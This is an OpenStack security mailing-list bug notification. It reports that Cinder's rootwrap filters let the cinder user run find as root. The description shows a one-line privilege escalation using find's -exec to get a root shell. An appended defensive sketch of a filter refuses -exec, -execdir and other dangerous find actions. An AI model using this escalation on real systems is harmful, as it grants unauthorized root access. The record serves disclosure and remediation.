[Openstack-security] [Bug 1250101] Re: Cinder's rootwrap filters allow to run find as root, which allows arbitrary commands

Thierry Carrez thierry.carrez+lp at gmail.com
Thu Apr 17 09:32:43 UTC 2014


** Changed in: cinder
    Milestone: icehouse-3 => 2014.1

-- 
You received this bug notification because you are a member of OpenStack
Security Group, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1250101

Title:
  Cinder's rootwrap filters allow to run find as root, which allows
  arbitrary commands

Status in Cinder:
  Fix Released
Status in Oslo - a Library of Common OpenStack Code:
  Invalid
Status in OpenStack Security Advisories:
  Invalid

Bug description:
  The patch
  https://github.com/openstack/cinder/commit/688c515b9d662486395d36c303ca599376a1dc0d
  added the find command to etc/cinder/rootwrap.d/volume.filters. This
  introduces a security hole as the find command is able to call exec,
  and so the cinder user can run any command as root. For example:

  vagrant@controller:~$ sudo -u cinder bash
  cinder@controller:~$ id
  uid=109(cinder) gid=115(cinder) groups=115(cinder)

  cinder@controller:~$ sudo /usr/bin/cinder-rootwrap /etc/cinder/rootwrap.conf find /etc/hosts -exec bash \;

  root@controller:~# id
  uid=0(root) gid=0(root) groups=0(root)

  
  I guess the way to fix this is to add a FindFilter to Oslo that rejects calls to find with the -exec or -execdir argument.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1250101/+subscriptions
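
The FindFilter idea from the bug description, sketched as an added example (not code from Cinder, Oslo or the reporter). It goes beyond rejecting -exec and -execdir by allowlisting find primaries, since find has other actions that run programs or modify files (-ok, -okdir, -delete, -fprint); the class, its method names and the /var/lib/cinder root are assumptions made for illustration.

```python
import os

# Allowlist of find primaries -> number of arguments each one consumes.
# Anything not listed is refused, which covers -exec and -execdir as well
# as -ok, -okdir, -delete, -fprint, -fprintf and -fls.
ALLOWED_PRIMARIES = {"-maxdepth": 1, "-mindepth": 1, "-name": 1,
                     "-type": 1, "-print": 0, "-print0": 0}


class FindFilter:
    """Hypothetical filter: may this find invocation run as root?"""

    def __init__(self, allowed_roots):
        # Roots are an assumption; a deployment would list only the
        # directories the service really needs to search.
        self.allowed_roots = [os.path.realpath(r) for r in allowed_roots]

    def _path_ok(self, path):
        real = os.path.realpath(path)  # collapses ".." and symlinks
        return any(os.path.commonpath([root, real]) == root
                   for root in self.allowed_roots)

    def match(self, userargs):
        if not userargs or userargs[0] != "find":
            return False
        args, i = userargs[1:], 0
        # Words before the first "-", "(" or "!" are start paths.
        while i < len(args) and args[i][:1] not in ("-", "(", "!"):
            if not self._path_ok(args[i]):
                return False
            i += 1
        if i == 0:  # no explicit start path: refuse
            return False
        # Every remaining token must be an allowlisted primary with
        # all of its arguments present.
        while i < len(args):
            nargs = ALLOWED_PRIMARIES.get(args[i])
            if nargs is None or i + nargs >= len(args):
                return False
            i += nargs + 1
        return True
```

Because each allowlisted primary consumes its own arguments, a value such as "-exec" passed as the pattern to -name is treated as data, while the same token in primary position is refused.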



